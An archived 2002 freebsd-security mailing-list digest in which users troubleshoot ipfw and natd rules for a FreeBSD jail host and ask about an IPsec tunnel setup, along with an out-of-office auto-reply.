From owner-freebsd-security Sun Jun 16 10:41:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from tomts12-srv.bellnexxia.net (tomts12.bellnexxia.net [209.226.175.56]) by hub.freebsd.org (Postfix) with ESMTP id B7DC937B416 for ; Sun, 16 Jun 2002 10:41:27 -0700 (PDT) Received: from dagobah.hotrs.org ([65.94.133.192]) by tomts12-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with SMTP id <20020616174126.LPDZ13338.tomts12-srv.bellnexxia.net@dagobah.hotrs.org> for ; Sun, 16 Jun 2002 13:41:26 -0400 Date: Sun, 16 Jun 2002 13:42:01 -0400 From: grimm To: freebsd-security@freebsd.org Subject: ipfw-ntad-jail Message-Id: <20020616134201.529b01aa.grimm@planetquake.com> X-Mailer: Sylpheed version 0.7.6 (GTK+ 1.2.10; i586-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Greetings, Ok, so I setup IPFW and NATd on my freeBSD 4.5-RELEASE box, where I configured a jail environment. Here are some details for first time readers: I have a host computer called dagobah, which runs a virtual system in a jailed environment, called darkside. This system is running FreeBSD 4.5-RELEASE. host (dagobah) xl0 IP 143.XX.XX.238 jail (darkside) IP alias to xl0 (192.168.200.13) What had happened is that once I setup IPFW, I could no longer connect (DNS lookup failure was causing huge delay on connect) to my jail (darkside). My other problem was making it possible to connect to these services from the outside world: host (dagobah) allow ftp (port 21) allow www (port 80) allow ssh (port 777) jail (darkside) allow ssh (port 22) with natd forwarding all requests dagobah received on port 22 to the jail's sshd. Everything else should be blocked. =========== question ===================================== My DNS lookup problem with IPFW running is now solved, internally I can connect to my jail without any problem. However, I can't connect from the outside world to my host (dagobah). I have tried to view the web page, as well as telnet and both don't connect. Although I do see in the IPFW SHOP output that some stuff seems to be reaching my port 80. I would really appreciate it if someone could look at my configs and point out my mistake. I have pretty much just learned how to do this stuff, and I may have missed something obvious! -------------- # rc.conf # hostname="dagobah.somewhere.ca" ifconfig_xl0="inet 142.XX.XX.238 netmask 255.255.255.0" defaultrouter="142.XX.XX.254" inetd_enable="YES" kern_securelevel_enable="NO" linux_enable="YES" moused_enable="YES" nfs_reserved_port_only="YES" sendmail_enable="NO" sshd_enable="YES" usbd_enable="YES" quota_enable="YES" check_quotas="YES" firewall_enable="YES" firewall_script="/etc/rc.firewall" firewall_type="/etc/ipfw.rules" gateway_enable="YES" natd_enable="YES" natd_interface="xl0" natd_flags="-config /etc/natd_rules" inetd_flags="-wW -a 142.XX.XX.238" portmap_enable="NO" syslogd_flags="-ss" -------------- # # natd config (/etc/natd_config) # redirect_port tcp 192.168.200.13:22 22 -------------- # # my ipfw.rules (additional to rc.firewall defaults) # #make sure natd gets a hold of the packets prior to FIREWALL add 00320 divert natd all from any to any via xl0 # # # from man 8 ipfw: allow only outbound TCP connections I've created add 00350 check-state add 00351 deny tcp from any to any in established add 00352 allow tcp from any to any out setup keep-state # # #allow DNS add 00400 allow udp from 142.XX.XX.1 to any in recv xl0 add 00401 allow udp from 142.XX.XX.2 to any in recv xl0 add 00402 allow udp from 142.XX.XX.3 to any in recv xl0 add 00403 allow udp from any to any out # #allow some ICMP types (codes not supported) ## allow path-mtu in both directions add 00600 allow icmp from any to any icmptypes 3 ## allow source quench in and out add 00601 allow icmp from any to any icmptypes 4 ## allow me to ping out and receive response back add 00602 allow icmp from any to any icmptypes 8 out add 00603 allow icmp from any to any icmptypes 0 in ## allow me to traceroute # # when I traceroute, I send out UDP packets (rule 00403) # add 00604 allow icmp from any to any icmptypes 11 in # # # enable www server on dagobah (142.XX.XX.238) add 00700 allow tcp from any to any 80 in via xl0 add 00701 allow tcp from any to any 80 out via xl0 # # # enable ssh server on dagobah (142.XX.XX.238) add 00702 allow tcp from any to any 777 in via xl0 add 00703 allow tcp from any to any 777 out via xl0 # # # enable ssh server on darkside (142.XX.XX.238) add 00704 allow tcp from any to any 22 in via xl0 add 00705 allow tcp from any to any 22 out via xl0 -------------- OUTPUT OF THE IPFW SHOW command 00100 0 0 allow ip from any to any via lo0 00200 0 0 deny ip from any to 127.0.0.0/8 00300 0 0 deny ip from 127.0.0.0/8 to any 00320 171 34652 divert 8668 ip from any to any via xl0 00350 0 0 check-state 00351 0 0 deny tcp from any to any in established 00352 78 8668 allow tcp from any to any keep-state out setup 00400 2 482 allow udp from 142.XX.XX.1 to any in recv xl0 00401 0 0 allow udp from 142.XX.XX.2 to any in recv xl0 00402 0 0 allow udp from 142.XX.XX.3 to any in recv xl0 00403 2 120 allow udp from any to any out 00600 0 0 allow icmp from any to any icmptype 3 00601 0 0 allow icmp from any to any icmptype 4 00602 0 0 allow icmp from any to any out icmptype 8 00603 0 0 allow icmp from any to any in icmptype 0 00604 0 0 allow icmp from any to any in icmptype 11 00700 3 144 allow tcp from any to any 80 in recv xl0 00701 0 0 allow tcp from any to any 80 out xmit xl0 00702 0 0 allow tcp from any to any 777 in recv xl0 00703 0 0 allow tcp from any to any 777 out xmit xl0 00704 0 0 allow tcp from any to any 22 in recv xl0 00705 0 0 allow tcp from any to any 22 out xmit xl0 65535 86 25238 deny ip from any to any __ grimm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 16 13:59:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from sccrmhc01.attbi.com (sccrmhc01.attbi.com [204.127.202.61]) by hub.freebsd.org (Postfix) with ESMTP id 21FD437B411 for ; Sun, 16 Jun 2002 13:59:05 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc01.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020616205904.NVZH1024.sccrmhc01.attbi.com@blossom.cjclark.org>; Sun, 16 Jun 2002 20:59:04 +0000 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g5GKx3G27316; Sun, 16 Jun 2002 13:59:03 -0700 (PDT) (envelope-from crist.clark@attbi.com) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Sun, 16 Jun 2002 13:59:03 -0700 From: "Crist J. Clark" To: grimm Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw-ntad-jail Message-ID: <20020616135903.B94357@blossom.cjclark.org> Reply-To: "Crist J. Clark" References: <20020616134201.529b01aa.grimm@planetquake.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020616134201.529b01aa.grimm@planetquake.com>; from grimm@planetquake.com on Sun, Jun 16, 2002 at 01:42:01PM -0400 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Jun 16, 2002 at 01:42:01PM -0400, grimm wrote: [snip] > # > # my ipfw.rules (additional to rc.firewall defaults) > # > #make sure natd gets a hold of the packets prior to FIREWALL > add 00320 divert natd all from any to any via xl0 > # > # > # from man 8 ipfw: allow only outbound TCP connections I've created > add 00350 check-state > add 00351 deny tcp from any to any in established > add 00352 allow tcp from any to any out setup keep-state [snip] > # enable www server on dagobah (142.XX.XX.238) > add 00700 allow tcp from any to any 80 in via xl0 > add 00701 allow tcp from any to any 80 out via xl0 > # > # > # enable ssh server on dagobah (142.XX.XX.238) > add 00702 allow tcp from any to any 777 in via xl0 > add 00703 allow tcp from any to any 777 out via xl0 > # > # > # enable ssh server on darkside (142.XX.XX.238) > add 00704 allow tcp from any to any 22 in via xl0 > add 00705 allow tcp from any to any 22 out via xl0 OK, some problems here. First, ITYM to have rules like, add allow tcp from any to me 80 in via xl0 add allow tcp from me 80 to any out via xl0 No? Second, these won't work since you are blocking all TCP connections that are not using 'keep-state' with rule 351. But... > 00100 0 0 allow ip from any to any via lo0 > 00200 0 0 deny ip from any to 127.0.0.0/8 > 00300 0 0 deny ip from 127.0.0.0/8 to any > 00320 171 34652 divert 8668 ip from any to any via xl0 > 00350 0 0 check-state > 00351 0 0 deny tcp from any to any in established I don't see this rule incrementing. > 00352 78 8668 allow tcp from any to any keep-state out setup > 00400 2 482 allow udp from 142.XX.XX.1 to any in recv xl0 > 00401 0 0 allow udp from 142.XX.XX.2 to any in recv xl0 > 00402 0 0 allow udp from 142.XX.XX.3 to any in recv xl0 > 00403 2 120 allow udp from any to any out > 00600 0 0 allow icmp from any to any icmptype 3 > 00601 0 0 allow icmp from any to any icmptype 4 > 00602 0 0 allow icmp from any to any out icmptype 8 > 00603 0 0 allow icmp from any to any in icmptype 0 > 00604 0 0 allow icmp from any to any in icmptype 11 > 00700 3 144 allow tcp from any to any 80 in recv xl0 > 00701 0 0 allow tcp from any to any 80 out xmit xl0 > 00702 0 0 allow tcp from any to any 777 in recv xl0 > 00703 0 0 allow tcp from any to any 777 out xmit xl0 > 00704 0 0 allow tcp from any to any 22 in recv xl0 > 00705 0 0 allow tcp from any to any 22 out xmit xl0 > 65535 86 25238 deny ip from any to any Always a good idea to add a, 65534 deny log ip from any to any Or something like it to help debugging. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 16 14:55:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from thor.birkenwald.de (thor.birkenwald.de [195.143.230.218]) by hub.freebsd.org (Postfix) with ESMTP id 0265C37B41D for ; Sun, 16 Jun 2002 14:55:41 -0700 (PDT) Received: by thor.birkenwald.de (Postfix, from userid 1000) id CC7631A7B7; Sun, 16 Jun 2002 23:55:39 +0200 (CEST) Date: Sun, 16 Jun 2002 23:55:39 +0200 From: Bernhard Schmidt To: freebsd-security@freebsd.org Subject: Too stupid for IPsec Message-ID: <20020616215539.GA3675@thor.birkenwald.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Warning, this is quite long. I don't know whether there is a better group for IPsec related things, if so please drop me a note. I just tried to establish a secure connection with IPsec between my router at home and my machine at work. The machine at home (heimdall) is running FBSD 4.6-RELEASE, the other one (lupus) is running FBSD 4.5-RELEASE-p4. Both have IPSEC, IPSEC_ESP and IPSEC_DEBUG integrated in the kernel. The structure of the network is as follows: At home: Windows ---+ | +----------+ Linux ---+----------------+ heimdall +------- (some routers) -------> | +----------+ FreeBSD ---+ 195.143.230.217/29 195.143.230.215/32 (alias) +-------+ <----------------+ lupus | +-------+ 195.143.155.4/32 At the moment I'm trying to encrypt/authenticate the data, when there is a connection between frigg (a not-ipsec aware linux box in my /29 above) and lupus. As far as I have understood the documentation, I need the tunnel mode in this case. My current approach looks like the following. I generated my spi definitions into a file and copy&pasted them into "setkey -c" on both sides. add 195.143.230.215 195.143.155.4 esp 1000 -m tunnel -E rijndael-cbc "1234567890123456" -A hmac-sha1 "12345678901234567890" ; add 195.143.155.4 195.143.230.215 esp 2000 -m tunnel -E rijndael-cbc "2345678901234567" -A hmac-sha1 "23456789012345678901" ; then I created my SPDs by adding spdadd 195.143.230.220/32 195.143.155.4/32 any -P out ipsec esp/tunnel/195.143.230.215-195.143.155.4/require ; on heimdall and spdadd 195.143.155.4/32 195.143.230.220/32 any -P out ipsec esp/tunnel/195.143.155.4-195.143.230.215/require ; on lupus. When I ping/telnet lupus from frigg and vice versa I can see ESP packets in tcpdump with the correct spi. But nothing more happens. lupus does not react on anything it receives with ESP and heimdall does not forward the (now unencrypted) packet to its second ethernet device. net.inet.ipsec.debug is set to "1" and I'm logging *.* to my server, but nothing shows up in the logfile (yes, syslog is set up correctly). Any ideas what could be missing/wrong? Any help appreciated, I'm probably just too blind to see the obvious solution. -- bye bye Bernhard To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 16 15:11:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id 9810437B425 for ; Sun, 16 Jun 2002 15:11:28 -0700 (PDT) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 465B88B5C7; Sun, 16 Jun 2002 15:11:28 -0700 (PDT) Message-ID: <3D0D0D10.AF4ED590@FreeBSD.org> Date: Sun, 16 Jun 2002 15:11:28 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.5-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Bernhard Schmidt Cc: freebsd-security@FreeBSD.ORG Subject: Re: Too stupid for IPsec References: <20020616215539.GA3675@thor.birkenwald.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Bernhard Schmidt wrote: > > Warning, this is quite long. I don't know whether there is a better > group for IPsec related things, if so please drop me a note. "I can't get this to work" questions are never appropriate for -security. If in doubt, you should first try your question on freebsd-questions. Then someone might suggest a more appropriate group if you don't get a useful response. Good luck, Doug -- "We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States State of the Union, January 28, 2002 Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 16 15:15:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from thor.birkenwald.de (thor.birkenwald.de [195.143.230.218]) by hub.freebsd.org (Postfix) with ESMTP id D6B7637B422; Sun, 16 Jun 2002 15:15:24 -0700 (PDT) Received: by thor.birkenwald.de (Postfix, from userid 1000) id 37B6D1A738; Mon, 17 Jun 2002 00:15:24 +0200 (CEST) Date: Mon, 17 Jun 2002 00:15:24 +0200 From: Bernhard Schmidt To: Doug Barton Cc: freebsd-security@FreeBSD.ORG Subject: Re: Too stupid for IPsec Message-ID: <20020616221524.GA4524@thor.birkenwald.de> References: <20020616215539.GA3675@thor.birkenwald.de> <3D0D0D10.AF4ED590@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D0D0D10.AF4ED590@FreeBSD.org> User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Jun 16, 2002 at 03:11:28PM -0700, Doug Barton wrote: > > Warning, this is quite long. I don't know whether there is a better > > group for IPsec related things, if so please drop me a note. > "I can't get this to work" questions are never appropriate for > -security. If in doubt, you should first try your question on > freebsd-questions. Then someone might suggest a more appropriate group > if you don't get a useful response. Oh thanks, overlooked the most obvious mailinglist. :-\ -- bye bye Bernhard To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 16 16: 1:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.blue-c.com (getaway.blue-c.com [213.208.14.2]) by hub.freebsd.org (Postfix) with ESMTP id E267E37B410 for ; Sun, 16 Jun 2002 16:01:42 -0700 (PDT) Subject: Javor Evstatiev/Vienna/Blue-C is out of the office. From: javor.evstatiev@blue-c.com To: security@FreeBSD.ORG Message-ID: Date: Mon, 17 Jun 2002 01:01:31 +0200 X-MIMETrack: Serialize by Router on MAIL01/Vienna/Blue-C(Release 5.0.8 |June 18, 2001) at 06/17/2002 01:01:44 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I will be out of the office starting 14.06.2002 and will not return until 09.09.2002. I will respond to your message when I return. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 16 17:37:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 43BC937B414 for ; Sun, 16 Jun 2002 17:37:24 -0700 (PDT) Received: 8.12.2-(Neptune) From: "Nielsen" To: "grimm" , References: <20020616134201.529b01aa.grimm@planetquake.com> Subject: Re: ipfw-ntad-jail MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020617003724.43BC937B414@hub.freebsd.org> Date: Sun, 16 Jun 2002 17:37:24 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hmmm, first of all (and maybe you've done this) you need to alias the jail's ip on you network card. Secondly make sure that "net.inet.ip.fw.one_pass" is set to 1 (the default). Otherwise diverted packets will continue down the fire wall after the divert rule. Lastly, I would check that the packets are in fact getting NAT'd in. It may be the out that's the problem. I think in addition to the redirect_tcp you also have to do a proper NAT thing. In my inderstanding, redirections open holes to let stuff in, but for the packets to get back out proper Natting is required. OTOH, most of my experience is with ipnat, so I'm not sure here. Nate ----- Original Message ----- From: "grimm" To: Sent: Sunday, June 16, 2002 11:42 Subject: ipfw-ntad-jail > Greetings, > > Ok, so I setup IPFW and NATd on my freeBSD 4.5-RELEASE box, > where I configured a jail environment. Here are some details for > first time readers: > > I have a host computer called dagobah, which > runs a virtual system in a jailed environment, called > darkside. This system is running FreeBSD 4.5-RELEASE. > > host (dagobah) xl0 IP 143.XX.XX.238 > jail (darkside) IP alias to xl0 (192.168.200.13) > > What had happened is that once I setup IPFW, I could no > longer connect (DNS lookup failure was causing huge delay > on connect) to my jail (darkside). > > My other problem was making it possible to connect to > these services from the outside world: > > host (dagobah) > allow ftp (port 21) > allow www (port 80) > allow ssh (port 777) > > jail (darkside) > allow ssh (port 22) > > with natd forwarding all requests dagobah received on port 22 > to the jail's sshd. > > Everything else should be blocked. > > =========== question ===================================== > > My DNS lookup problem with IPFW running is now solved, internally > I can connect to my jail without any problem. > > However, I can't connect from the outside world to my host (dagobah). > I have tried to view the web page, as well as telnet and both > don't connect. Although I do see in the IPFW SHOP output that > some stuff seems to be reaching my port 80. > > I would really appreciate it if someone could look at my configs > and point out my mistake. I have pretty much just learned how to > do this stuff, and I may have missed something obvious! > > -------------- > > # rc.conf > # > hostname="dagobah.somewhere.ca" > ifconfig_xl0="inet 142.XX.XX.238 netmask 255.255.255.0" > defaultrouter="142.XX.XX.254" > inetd_enable="YES" > kern_securelevel_enable="NO" > linux_enable="YES" > moused_enable="YES" > nfs_reserved_port_only="YES" > sendmail_enable="NO" > sshd_enable="YES" > usbd_enable="YES" > quota_enable="YES" > check_quotas="YES" > firewall_enable="YES" > firewall_script="/etc/rc.firewall" > firewall_type="/etc/ipfw.rules" > gateway_enable="YES" > natd_enable="YES" > natd_interface="xl0" > natd_flags="-config /etc/natd_rules" > inetd_flags="-wW -a 142.XX.XX.238" > portmap_enable="NO" > syslogd_flags="-ss" > > > -------------- > > # > # natd config (/etc/natd_config) :> # > redirect_port tcp 192.168.200.13:22 22 > > > -------------- > > # > # my ipfw.rules (additional to rc.firewall defaults) > # > #make sure natd gets a hold of the packets prior to FIREWALL > add 00320 divert natd all from any to any via xl0 > # > # > # from man 8 ipfw: allow only outbound TCP connections I've created > add 00350 check-state > add 00351 deny tcp from any to any in established > add 00352 allow tcp from any to any out setup keep-state > # > # > #allow DNS > add 00400 allow udp from 142.XX.XX.1 to any in recv xl0 > add 00401 allow udp from 142.XX.XX.2 to any in recv xl0 > add 00402 allow udp from 142.XX.XX.3 to any in recv xl0 > add 00403 allow udp from any to any out > # > #allow some ICMP types (codes not supported) > ## allow path-mtu in both directions > add 00600 allow icmp from any to any icmptypes 3 > ## allow source quench in and out > add 00601 allow icmp from any to any icmptypes 4 > ## allow me to ping out and receive response back > add 00602 allow icmp from any to any icmptypes 8 out > add 00603 allow icmp from any to any icmptypes 0 in > ## allow me to traceroute > # > # when I traceroute, I send out UDP packets (rule 00403) > # > add 00604 allow icmp from any to any icmptypes 11 in > # > # > # enable www server on dagobah (142.XX.XX.238) > add 00700 allow tcp from any to any 80 in via xl0 > add 00701 allow tcp from any to any 80 out via xl0 > # > # > # enable ssh server on dagobah (142.XX.XX.238) > add 00702 allow tcp from any to any 777 in via xl0 > add 00703 allow tcp from any to any 777 out via xl0 > # > # > # enable ssh server on darkside (142.XX.XX.238) > add 00704 allow tcp from any to any 22 in via xl0 > add 00705 allow tcp from any to any 22 out via xl0 > > > -------------- > > OUTPUT OF THE IPFW SHOW command > > 00100 0 0 allow ip from any to any via lo0 > 00200 0 0 deny ip from any to 127.0.0.0/8 > 00300 0 0 deny ip from 127.0.0.0/8 to any > 00320 171 34652 divert 8668 ip from any to any via xl0 > 00350 0 0 check-state > 00351 0 0 deny tcp from any to any in established > 00352 78 8668 allow tcp from any to any keep-state out setup > 00400 2 482 allow udp from 142.XX.XX.1 to any in recv xl0 > 00401 0 0 allow udp from 142.XX.XX.2 to any in recv xl0 > 00402 0 0 allow udp from 142.XX.XX.3 to any in recv xl0 > 00403 2 120 allow udp from any to any out > 00600 0 0 allow icmp from any to any icmptype 3 > 00601 0 0 allow icmp from any to any icmptype 4 > 00602 0 0 allow icmp from any to any out icmptype 8 > 00603 0 0 allow icmp from any to any in icmptype 0 > 00604 0 0 allow icmp from any to any in icmptype 11 > 00700 3 144 allow tcp from any to any 80 in recv xl0 > 00701 0 0 allow tcp from any to any 80 out xmit xl0 > 00702 0 0 allow tcp from any to any 777 in recv xl0 > 00703 0 0 allow tcp from any to any 777 out xmit xl0 > 00704 0 0 allow tcp from any to any 22 in recv xl0 > 00705 0 0 allow tcp from any to any 22 out xmit xl0 > 65535 86 25238 deny ip from any to any > > __ > grimm > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 16 19:33:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from tomts24-srv.bellnexxia.net (tomts24.bellnexxia.net [209.226.175.187]) by hub.freebsd.org (Postfix) with ESMTP id 2BEA337B40D; Sun, 16 Jun 2002 19:33:54 -0700 (PDT) Received: from dagobah.hotrs.org ([65.94.133.192]) by tomts24-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with SMTP id <20020617023353.XEVW9770.tomts24-srv.bellnexxia.net@dagobah.hotrs.org>; Sun, 16 Jun 2002 22:33:53 -0400 Date: Sun, 16 Jun 2002 22:34:29 -0400 From: grimm To: "Crist J. Clark" Cc: crist.clark@attbi.com, freebsd-security@FreeBSD.ORG Subject: Re: ipfw-ntad-jail Message-Id: <20020616223429.2f200728.grimm@planetquake.com> In-Reply-To: <20020616135903.B94357@blossom.cjclark.org> References: <20020616134201.529b01aa.grimm@planetquake.com> <20020616135903.B94357@blossom.cjclark.org> X-Mailer: Sylpheed version 0.7.6 (GTK+ 1.2.10; i586-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Greetings Crist, What I find odd is that I read that section of my rules from a tutorial on the o'reilly site. I read through a bunch of tutors and help pages and never saw the keyword "me" being used. But I will definately give it a try. Like I said, I read that 351 rule directly from a tutorial. The problem I am having is that I don't have the machine at home, and sending messages to the list from work wasn't working! I am so glad to have gotten so much feedback already! I am new to this, but what can you suggest I do. Are there some rules in there you think are trouble and I should edit or comment out and test with something else? I mean, so far I've gotten great help, but no one has mentionned a specific rule which is WRONG! so I am not really sure where to begin. I'll take your advice and see where that leads. As for the logging, great idea! I'll also enable log_in_vain. cheers, __ Andrew "Crist J. Clark" wrote: > OK, some problems here. First, ITYM to have rules like, > > add allow tcp from any to me 80 in via xl0 > add allow tcp from me 80 to any out via xl0 > > No? Second, these won't work since you are blocking all TCP > connections that are not using 'keep-state' with rule 351. >>> add 00350 check-state >>> add 00351 deny tcp from any to any in established >>> add 00352 allow tcp from any to any out setup keep-state > But... > Always a good idea to add a, > > 65534 deny log ip from any to any > > Or something like it to help debugging. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 16 19:44:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from tomts13-srv.bellnexxia.net (tomts13.bellnexxia.net [209.226.175.34]) by hub.freebsd.org (Postfix) with ESMTP id 54CB737B440 for ; Sun, 16 Jun 2002 19:44:05 -0700 (PDT) Received: from dagobah.hotrs.org ([65.94.133.192]) by tomts13-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with SMTP id <20020617024401.USXB12468.tomts13-srv.bellnexxia.net@dagobah.hotrs.org>; Sun, 16 Jun 2002 22:44:01 -0400 Date: Sun, 16 Jun 2002 22:44:40 -0400 From: grimm To: "Nielsen" Cc: freebsd-security@freebsd.org Subject: Re: ipfw-ntad-jail Message-Id: <20020616224440.46dcdfaa.grimm@planetquake.com> In-Reply-To: <200206170035.g5H0Zr3g029046@mail2.gamespy.com> References: <20020616134201.529b01aa.grimm@planetquake.com> <200206170035.g5H0Zr3g029046@mail2.gamespy.com> X-Mailer: Sylpheed version 0.7.6 (GTK+ 1.2.10; i586-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Greetings Nielsen, On Sun, 16 Jun 2002 17:35:53 -0700 "Nielsen" wrote: > Hmmm, first of all (and maybe you've done this) you need to alias the > jail's ip on you network card. Yes, I have aliased the ip to the network card with ipconfig. >Secondly make sure that > "net.inet.ip.fw.one_pass" is set to 1 (the default). Otherwise > diverted packets will continue down the fire wall after the divert > rule. It's on my list of things to do. That could definately be a huge problem, if the diverted packets were then being chewed up by a firewall rule. > Lastly, I would check that the packets are in fact getting NAT'd in. > It may be the out that's the problem. How do I check that? >I think in addition to the > redirect_tcp you also have to do a proper NAT thing. In my > inderstanding, redirections open holes to let stuff in, but for the > packets to get back out proper Natting is required. OTOH, most of my > experience is with ipnat, so I'm not sure here. I am not sure if there is a proper nat thing required, cause from within the machine, I can ssh and telnet to the jail no problem. Do you think, given that it works from within, that it could still be a problem? I am trying right now, just to figure out why my web server, and ssh on the host (dagobah) aren't responding. It seems like there is something fundamentally wrong with my firewall rules. No one has been able to pinpoint an exact major problem that could cause this. I think once I fix that, I could then concentrate on the jail issue. But right now, the simplest thing isn't working! cheers, __ Andrew > ----- Original Message ----- > From: "grimm" > To: > Sent: Sunday, June 16, 2002 11:42 > Subject: ipfw-ntad-jail > > > > Greetings, > > > > Ok, so I setup IPFW and NATd on my freeBSD 4.5-RELEASE box, > > where I configured a jail environment. Here are some details for > > first time readers: > > > > I have a host computer called dagobah, which > > runs a virtual system in a jailed environment, called > > darkside. This system is running FreeBSD 4.5-RELEASE. > > > > host (dagobah) xl0 IP 143.XX.XX.238 > > jail (darkside) IP alias to xl0 (192.168.200.13) > > > > What had happened is that once I setup IPFW, I could no > > longer connect (DNS lookup failure was causing huge delay > > on connect) to my jail (darkside). > > > > My other problem was making it possible to connect to > > these services from the outside world: > > > > host (dagobah) > > allow ftp (port 21) > > allow www (port 80) > > allow ssh (port 777) > > > > jail (darkside) > > allow ssh (port 22) > > > > with natd forwarding all requests dagobah received on port 22 > > to the jail's sshd. > > > > Everything else should be blocked. > > > > =========== question ===================================== > > > > My DNS lookup problem with IPFW running is now solved, internally > > I can connect to my jail without any problem. > > > > However, I can't connect from the outside world to my host > > (dagobah). I have tried to view the web page, as well as telnet and > > both don't connect. Although I do see in the IPFW SHOP output that > > some stuff seems to be reaching my port 80. > > > > I would really appreciate it if someone could look at my configs > > and point out my mistake. I have pretty much just learned how to > > do this stuff, and I may have missed something obvious! > > > > -------------- > > > > # rc.conf > > # > > hostname="dagobah.somewhere.ca" > > ifconfig_xl0="inet 142.XX.XX.238 netmask 255.255.255.0" > > defaultrouter="142.XX.XX.254" > > inetd_enable="YES" > > kern_securelevel_enable="NO" > > linux_enable="YES" > > moused_enable="YES" > > nfs_reserved_port_only="YES" > > sendmail_enable="NO" > > sshd_enable="YES" > > usbd_enable="YES" > > quota_enable="YES" > > check_quotas="YES" > > firewall_enable="YES" > > 